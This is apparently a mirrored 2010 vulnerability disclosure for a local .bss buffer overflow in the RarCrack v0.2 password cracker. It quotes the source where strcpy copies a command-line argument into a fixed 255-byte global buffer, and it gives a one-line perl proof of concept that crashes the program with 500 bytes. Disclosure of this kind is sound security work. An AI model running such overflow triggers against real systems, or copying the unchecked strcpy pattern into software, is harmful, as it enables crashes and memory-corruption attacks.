扫码分享
验证:
体验盒子
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 | The software can be downloaded here: http://rarcrack.sourceforge.net/ # Author: stoke # Date: 2010-09-20 # Download: http://rarcrack.sourceforge.net/ # Tested on: Backtrack 4 ############################# Site: http://devilcode.it | http://hack2web.altervista.org Special greetz to: nex, for reassure me when i sayed "WHY EIP IT'S NOT CHANGED!!!!!!!?!!!" ___________ /\_<code>\ __/\_ \ /'__</code>\ /\ \ \ \ \/\ \______/\_\//\ \ ___ /\ \/\ \\_\ \ __ ____ __ ________ \ \ \ \ \ /'__<code>\\ \/\ \/\ \\ \ \ /'___\ \ \ \ \ /'_</code> \/'__<code>\/'___\</code>'__\'__<code>\\ \/\ \/\ \ \ \ \_\ \\__/ \ \_/ | \ \\_\ \_/\ \__/\ \ \_\ \\ \L\ \/\__/ /\ \__/ \ \/\__/ \ \_/ \_/ \ \ \____/ \____\ \___/ \ \_\\____\ \____\\ \____/ \___,_\ \____\\ \____\ \_\ \____\ \___x___/' \/___/ \/____/\/__/ \/_//____/\/____/ \/___/ \/__,_ /\/____/ \/____/\/_/\/____/\/__//__/ Crew Members: bl3ck, stoke, Shellcoder_, n1md4, sys.x4sh, Ax3L, s1y, LostPassword, nex & overmind ############################ RarCrack v0.2 bss overflow PoC ########################################### Function affected: init(); Type: local; Variable overflowed:filename; ########################################### ######################################################## Here we have: ----- Start useful code snip -------- char filename[255]; ----- End useful code snip ---------- This variable is above the "main" function, so is global and allocated on .bss. In init() function we have: ---- Start useful code snip ---- if (strcmp(argv[i],"--help") == 0) { printf("Usage: rarcrack encrypted_archive.ext [--threads NUM] [--type rar|zip|7z]\n\n"); printf("Options: --help: show this screen.\n"); printf(" --type: you can specify the archive program, this needed when\n"); printf(" the program couldn't detect the proper file type\n"); printf(" --threads: you can specify how many threads\n"); printf("will be run, maximum 12 (default: 2)\n\n"); printf("Info:This program supports only RAR, ZIP and 7Z encrypted archives.\n"); printf(" RarCrack! usually detects the archive type.\n\n"); help = 1; break; } else if (strcmp(argv[i],"--threads") == 0) { if ((i + 1) < argc) { sscanf(argv[++i], "%d", &threads); if (threads < 1) threads = 1; if (threads > 12) { printf("INFO: number of threads adjusted to 12\n"); threads = 12; } } else { printf("ERROR: missing parameter for option: --threads!\n"); help = 1; } } else if (strcmp(argv[i],"--type") == 0) { if ((i + 1) < argc) { sscanf(argv[++i], "%s", &test); for (j = 0; strcmp(TYPE[j], "") != 0; j++) { if (strcmp(TYPE[j], test) == 0) { strcpy(finalcmd, CMD[j]); archive_type = j; break; } } if (archive_type < 0) { printf("WARNING: invalid parameter --type %s!\n", argv[i]); finalcmd[0] = '\0'; } } else { printf("ERROR: missing parameter for option: --type!\n"); help = 1; } } else { strcpy((char*)&filename, argv[i]); ---- Stop useful code snip ---- How you can see, at the end of this code we have a strcpy to our "filename" variable, so, if you put more than 255 bytes in an argv, you will have a Segmentation Fault. ########################################################################### ########################################################################### PoC ./rarcrack </code>perl -e 'print "A" x500'` ########################################################################### |
体验盒子
